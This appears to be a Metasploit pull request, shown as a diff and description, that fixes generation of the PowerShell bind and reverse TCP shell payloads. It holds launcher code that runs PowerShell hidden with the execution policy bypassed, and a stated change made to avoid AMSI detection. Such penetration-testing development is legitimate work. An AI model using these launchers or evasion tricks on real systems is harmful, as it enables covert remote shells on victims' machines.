### PR TITLE
Address generation issues with pure PSH payloads

### DIFF
--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -51,7 +51,7 @@ module Payload::Windows::Powershell
         executionpolicy: 'bypass'
     }
     cli =  Rex::Powershell::Command.generate_psh_command_line(command_args)
-    return "#{cli} '&([scriptblock]::create(#{script})'"
+    return "#{cli} \"#{script}\""
   end
 
   def generate

--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -44,7 +44,18 @@ module Payload::Windows::Powershell
     script_in.gsub!('LHOST_REPLACE', lhost.to_s)
 
     script = Rex::Powershell::Command.compress_script(script_in)
-    "powershell.exe -exec bypass -nop -W hidden -noninteractive IEX $(#{script})"
+    command_args = { 
+        noprofile: true,
+        windowstyle: 'hidden',
+        noninteractive: true,
+        executionpolicy: 'bypass'
+    }
+    cli =  Rex::Powershell::Command.generate_psh_command_line(command_args)
+    return "#{cli} '&([scriptblock]::create(#{script})'"
+  end
+
+  def generate
+    command_string
   end
 end
 end

--- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp'
 
 module MetasploitModule
 
-  CachedSize = 1518
+  CachedSize = 1501
 
   include Msf::Payload::Single
   include Rex::Powershell::Command

--- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 
 module MetasploitModule
 
-  CachedSize = 1526
+  CachedSize = 1509
 
   include Msf::Payload::Single
   include Rex::Powershell::Command

--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module MetasploitModule
 
-  CachedSize = 1703
+  CachedSize = 1501
 
   include Msf::Payload::Windows::Exec
   include Rex::Powershell::Command

--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module MetasploitModule
 
-  CachedSize = 1711
+  CachedSize = 1509
 
   include Msf::Payload::Windows::Exec
   include Msf::Payload::Windows::Powershell

--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module MetasploitModule
 
-  CachedSize = 1786
+  CachedSize = 1501
 
   include Msf::Payload::Windows::Exec_x64
   include Rex::Powershell::Command

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module MetasploitModule
 
-  CachedSize = 1794
+  CachedSize = 1509
 
   include Msf::Payload::Windows::Exec_x64
   include Msf::Payload::Windows::Powershell


### PR DESCRIPTION
Powershell payloads were generating using the :generate method
mixed in from Payload::Windows::Exec which is a binary payload
mixin.

Address the breakage by implementing a generate method which simply
outputs the script code produced by the module with no additional
content prepended or appended.

While here, cleanup the commandline generation for the script being
produced by having Rex do it (this permits changes made in Rex to
benefit all consumers).

As a bonus, drop the IEX invocation since it'll trip up AMSI and
upgrade to the scripblock execution semantic.

Credit for finding this little gem goes to bperry - i dont usually
use the native powershell command shells, and managed to miss this
for a long time. Thanks boss.

Testing:
  Local in pry

@bperry: Could you test and ping me back if this is right?

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use payload/windows/powershell_reverse_tcp`
- [ ] Set options
- [ ] Generate raw output via `generate -f raw`
- [ ] **Verify** That its textual output, not a binary string prepending the text or after it
- [ ] **Verify** That it works as intended upon execution (i've not tested this part)))

